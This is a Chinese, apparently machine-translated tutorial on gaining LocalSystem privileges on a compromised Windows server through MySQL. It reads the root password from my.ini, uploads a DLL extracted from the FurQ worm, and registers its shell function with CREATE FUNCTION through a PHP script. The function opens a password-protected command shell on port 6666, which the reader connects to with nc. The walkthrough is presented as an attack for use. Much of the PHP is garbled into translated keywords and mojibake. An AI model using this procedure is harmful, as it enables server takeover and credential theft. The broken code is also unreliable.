本篇内容介绍了“怎么给MySQL提升权限”的有关知识,在实际案例的操作过程中,不少人都会遇到这样的困境,接下来就让小编带领大家学习一下如何处理这些情况吧!希望大家仔细阅读,能够学有所成!
其实我们早就能想的到。当我们在对MSSQLOracle数据库进行攻击的时候,得到了最数据库中高权限的帐户,往往都是执行特殊的扩展过程或者函数来进行攻击的。比如该有Xp_cmdshell,甲骨文可以通过Msvcrt.dll来创建一个特殊的函数。而我们却始终没有想的到,作为流行的数据库软件之一的MySQL,也是可以进行函数的创建的。由此看来,MySQL的这个漏洞不应称为漏洞而仅仅是一个技术而已。
废话一堆过后,我们来了解一下怎么在MySQL里创建一个函数吧。这比如何利用重要许多,只要了解了原理,运用就能更加灵活,而且可以与其他思想融会贯通。
MySQL中创建一个函数的语句为:
创建函数FunctionName返回(字符串|整数|真实)Soname C: function.dll;
其中FunctionName指的是函数的名称,C: function.dll指的是函数所调用的DLL,而函数名正是DLL中的函数名称。不过这里需要我们注意的是,如果我们需要MySQL可以在函数之中附带一个参数的话,那么就要符合UDF形式的程序编写规则,具体的可以查看MySQL手册的第14节:《为MySQL增加新函数》。而其中字符串,INTEGET,真正是函数执行后所返回的值的形式。当然,我们大可不必遵循UDF形式的编写,其实如果我们的函数中使用一个我们要执行的代码,而不使用参数,一样可以达到攻击的效果,比如说系统(“command.com")等等。网上现在以此漏洞进行攻击的FurQ蠕虫就是一个不使用UDF格式的例子。但是注意,这个创建函数的语句必须要求我们所用的MySQL帐户有对MySQL这个数据库的写权限,否则无法正常使用。
好了。了解了原理之后,我们来实战一下如何使用MySQL提升权限。
在这里我们已经通过各式各样的漏洞取得了一个服务器的网站管理权限,我这里演示的是天使的间谍,因为PHP默认有连接MySQL的函数,而ASP这些需要使用附加的组件来进行连接,本身不具备条件的。
一般来说,在赢得系统下面,很多软件都会在系统目录下创建一个叫my.ini的文件,其中包含了很敏感的MySQL信息。而如果我们攻克的主机没有非常好的权限设置的话,我们本身就具有对%列出%目录的浏览权限,所以可以非常容易的读取其中的信息。而且非常多的管理员通常是将根帐户与密码写进这个my.ini,所以一旦我们读到根用户的密码,就可以操纵整个MySQL或者是服务器了。如图1所示。
得到MySQL的根密码之后,我们需要上传我们的DLL文件,我这里使用的是从FurQ蠕虫中提取的FurQ.dll。执行这个FurQ.dll中的壳函数,系统将会在6666年端口打开一个带密码的CMDShell,当然,密码我们已经知道,就是“FurQ"几个字符而已。不过我们现在还没有执行的条件,需要通过MySQL将这个函数创建到MySQL中去。
现在,我们用PHPSPY新建一个PHP文件。
输入以下的内容
$链接=_connect(127.0.0.1,根,根);
如果(! $链接){
死(不能连接数据库!:,。mysql_error ());
};
回声“好Boy.Connected !
“;
//这里的rootoot就是从my.ini中读取的用户和密码。
@mysql_select_db (mysql)或死亡(使用mysql数据库失败!);
回声“是的你!
“;
//这里选择使用mysql数据库表。当然你也可以选择别的,如测试。
$查询=按唇ê欠祷卣齋ONAME d: \ wwwroot \ FurQ.dll;“
@ $结果=mysql_query(查询,美元链接)或死亡(“创建函数失败!“);
回声“女神…成功!
“;
//这两句话是关键,执行MySQL的创建函数语句。将d: wwwrootfurq.dll中的壳函数创建进MySQL中。使得MySQL可以执行这个壳函数。
$查询=把≡窨?);“;
@ $结果=mysql_query(查询,美元链接)或死亡(“执行failed");
回声,恭喜你!连接端口6666上的服务器和密码:FurQ
“;
//这一步是执行这个壳函数,打开服务器的6666端口。
?在
再次执行,全部正常返回。如图2所示。那么现在,我们就可以使用数控连接服务器的6666端口,输入这个密码:FurQ。然后就返回CMDSHELL了. .当然,由于继承的是MySQL的权限,而赢得系统下MySQL默认以服务安装,也就是说,我们得到的外壳为LocalSystem权限,可以为所欲为了,不过不要做坏事哦,呵呵。
